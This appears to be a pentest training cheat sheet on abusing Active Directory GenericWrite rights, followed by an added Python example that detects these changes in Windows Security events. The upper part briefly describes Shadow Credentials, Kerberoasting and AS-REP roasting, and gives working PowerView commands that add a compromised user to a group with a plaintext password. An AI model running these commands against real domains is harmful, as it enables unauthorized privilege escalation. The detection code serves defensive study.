GenericWrite
Over a User
Attack
Description
Abuses write access to a user/computer’s msDS-KeyCredentialLink to add authentication material and impersonate them via PKINIT.
Requests a service ticket (TGS) for a specific SPN to extract and crack the associated service account’s NTLM hash.
Requests an AS-REP for a user without Kerberos pre-authentication, allowing offline cracking of their NTLM hash.
Over a Group
Adding Group Member
# creating a SecureString Object for the owned user
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword)
# add the compromised user to the group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred -Verbose
# confirm that damundsen was added to the group
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName
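Every technique on this page, whether against a user or a group, leaves a directory change in the domain controller's Security log. The following is an added detection example, not part of the original page: it classifies parsed events by the standard Windows event IDs and field names. The sample events, the DN suffix, the target names and the svc_sync and WS01 accounts are constructed, and the 5136 events assume directory-change auditing with SACLs on the objects.

```python
# Added example (not from the original page). Events are constructed dicts using
# Windows Security log field names; 5136 needs directory-change auditing and SACLs.
GROUP_ADD_IDS = {4728, 4732, 4756}  # member added: global / local / universal group
VALUE_ADDED = "%%14674"             # 5136 OperationType for "Value Added"
DONT_REQ_PREAUTH = 0x400000         # userAccountControl flag: no Kerberos pre-auth

def classify(ev):
    """Return a short finding for one event, or None if it is not of interest."""
    eid = ev.get("EventID")
    if eid in GROUP_ADD_IDS:
        return f"group-add:{ev['TargetUserName']}:{ev['MemberName']}"
    if eid != 5136 or ev.get("OperationType") != VALUE_ADDED:
        return None
    attr, dn = ev.get("AttributeLDAPDisplayName"), ev.get("ObjectDN")
    if attr == "msDS-KeyCredentialLink":
        return f"key-credential-added:{dn}"
    # Computers register SPNs routinely; an SPN appearing on a user object is rarer.
    if attr == "servicePrincipalName" and ev.get("ObjectClass") == "user":
        return f"spn-set-on-user:{dn}"
    if attr == "userAccountControl":
        value = str(ev.get("AttributeValue", ""))
        if value.isdigit() and int(value) & DONT_REQ_PREAUTH:
            return f"preauth-disabled:{dn}"
    return None

def findings(events, expected_writers=frozenset()):
    """Classify events, skipping writers known to make these changes legitimately."""
    hits = []
    for ev in events:
        who = ev.get("SubjectUserName")
        hit = None if who in expected_writers else classify(ev)
        if hit:
            hits.append((who, hit))
    return hits

BASE = "DC=INLANEFREIGHT,DC=LOCAL"  # constructed DN suffix

def mod(who, cls, cn, attr, value):  # builds one constructed 5136 event
    return {"EventID": 5136, "OperationType": VALUE_ADDED, "SubjectUserName": who,
            "ObjectClass": cls, "ObjectDN": f"CN={cn},{BASE}",
            "AttributeLDAPDisplayName": attr, "AttributeValue": value}

SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "damundsen",
     "TargetUserName": "Help Desk Level 1", "MemberName": f"CN=damundsen,{BASE}"},
    mod("damundsen", "user", "target1", "msDS-KeyCredentialLink", "<constructed>"),
    mod("svc_sync", "computer", "WS01", "msDS-KeyCredentialLink", "<constructed>"),
    mod("damundsen", "user", "target2", "servicePrincipalName", "constructed/spn"),
    mod("WS01$", "computer", "WS01", "servicePrincipalName", "HOST/WS01"),
    mod("damundsen", "user", "target3", "userAccountControl", "4260352"),
    mod("helpdesk1", "user", "target4", "userAccountControl", "512"),
]
```

The expected_writers set is where accounts that legitimately write key credentials (for example a sync or device-registration account) are listed, so the remaining hits are the ones worth reviewing.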